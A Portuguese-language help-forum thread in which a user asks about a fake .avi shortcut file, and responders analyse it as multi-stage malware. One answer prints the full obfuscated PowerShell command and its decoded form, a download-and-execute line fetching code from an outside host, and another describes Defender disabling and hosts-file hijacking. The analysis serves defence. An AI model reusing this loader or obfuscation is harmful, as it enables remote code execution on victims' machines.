Esta é uma invocação de malware do Powershell?

6

Eu recebi um arquivo que foi .avi na primeira vista, mas descobri que na verdade esse é um arquivo .lnk , mas já era tarde demais.

E o atributo do elemento de destino desse arquivo é C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82

O ponto de partida é: %SYSTEMROOT%\System32\WindowsPowerShell\v1.0

Eu criei String fora dos seguintes códigos ASCII e parece que é um formato BASE64 de Hallo World! . Parece muito confuso para mim, pois não consegui encontrar os parâmetros NoPr , Wind e eXEc em nenhum dos documentos do Powershell, e por algum motivo o arquivo tinha tamanho de 700MB até que eu removesse o valor .avi do arquivo campo de descrição.

Você sabe o que este arquivo pode tentar fazer?

    
por Yoda 05.11.2018 / 18:45

4 respostas

7

Isto é definitivamente malware!

Basicamente, este é um malware com vários estágios. Até agora eu passei por:

Estágio 1 (o arquivo .lnk)

Faz o download e executa o código do powershell a partir do link

Estágio 2

O código PowerHell baixado contém uma cópia fiel do link , que parece para ser um desvio do UAC. Em seguida, ele faz o download e executa (como admin) um arquivo em lotes.

Estágio 3

O arquivo em lote primeiro tenta desabilitar todos os componentes do Windows Defender (drivers, tarefas agendadas, entradas de execução automática) e adiciona diretivas de grupo a esse efeito. Em seguida, ele faz o download e executa dois arquivos. Vou postar links totais de vírus para os arquivos.

  1. link
  2. link

O primeiro parece ser um malware reconhecido. Considerando que o segundo é um instalador NSIS que ainda tenho que analisar completamente. Parece substituir o arquivo hosts do sistema por seu próprio, redirecionando muitos domínios para o 80.241.222.137 e instalando um certificado raiz.

    
por 11.11.2018 / 02:16
4

@zoredache parece ter o jist. É apenas executar o comando em uma janela com o noprofile carregado com a política de execução no modo bypass (não requer assinatura de código).

Você pode testar com o seguinte (adicionei os três parênteses no final, mas sinto que algo está faltando.)

$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582

Não faço ideia do que é esse código, mas acho que a ideia era concatenar os códigos de caracteres DEC ASCII em uma string. Seu "Olá mundo!" parece estar fora da marca do que eu posso dizer. Para começar, há muito mais caracteres na string que você tem.

O

link sugere o seguinte:

SUB _ M N F RS ETX RS SYN SYN p [ I DC3 q \ T [ ] J RS m G M J [ S DLE p [ J DLE i Z \ } R

    
por 05.11.2018 / 19:29
4

Eu fiquei um pouco mais longe com isso, pois o mesmo aconteceu no computador do meu parceiro. O destino do arquivo LNK é realmente muito maior do que o que se encaixa na caixa na janela de propriedades. Com o linkanalyzer recuperei o alvo completo:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP  [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82 ,87, 91 , 80 ,74 ,23 , 23,16,122,81 ,73,80 ,82 , 81 , 95, 90 , 109, 74 ,76,87,80 , 89,22, 25 , 86 , 74, 74 ,78, 4, 17 ,17 , 68,72 , 92 ,16 ,75,77 ,17 ,15 ,25,23 ,5 , 119, 123 ,102 ,30, 26, 95, 77 ,78 , 70 )|fOReAch-ObjECT {[cHAr] ($_ -bXOr'0x3E')}) ) | .( $EnV:coMsPeC[4,24,25]-jOiN'')

No comando acima, tudo até o |. cria uma lista de números, faz algum tipo de operação XOR binária em cada um dos números e, em seguida, associa o resultado a uma string. Eu acredito que esta é uma maneira de ofuscar o código. O resultado é:

$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx

Isso é canalizado em ( $EnV:coMsPeC[4,24,25]-jOiN'') .

COMSPEC é o interpretador de linha de comando, mas não sei o que a parte [4,24,25]-jOiN deve fazer. No melhor dos casos, apenas faz o download do URL na função DownloadString e isso é tudo; no pior dos casos, faz o download de algo e executa isso. Eu não sou corajoso o suficiente para seguir a URL.

No geral, eu diria que isso se parece muito com malware, mas seria ótimo se alguém com experiência em powershell pudesse comentar.

    
por 10.11.2018 / 23:28
0

Malware. Escondido em

link

Encontrei este tópico via google. Isso vai ser vírus / malware etc e provavelmente vai estragar seu PC. Ele é anexado a vários arquivos grandes no PirateBay e oculta códigos que instalam porcaria no seu PC. NÃO o execute. Excluir imediatamente. Isso está no filme 'Bohemian Rhapsody 2018.avi' do PirateBay, mas o arquivo 700mg é apenas espaço, é realmente um link / atalho simbólico para a porcaria. Verifique a guia de propriedades.

C: \ Windows \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG] :: join ('', ((26, 95, 77, 78, 70, 30 3, 30, 22, 22, 112, 91, 73, 19, 113, 92, 84, 91, 93, 74, 30, 109, 71, 77, 74, 91, 33, 16, 112, 91, 74, 16 , 105,91, 92, 125, 82

    
por 11.11.2018 / 22:16

Tags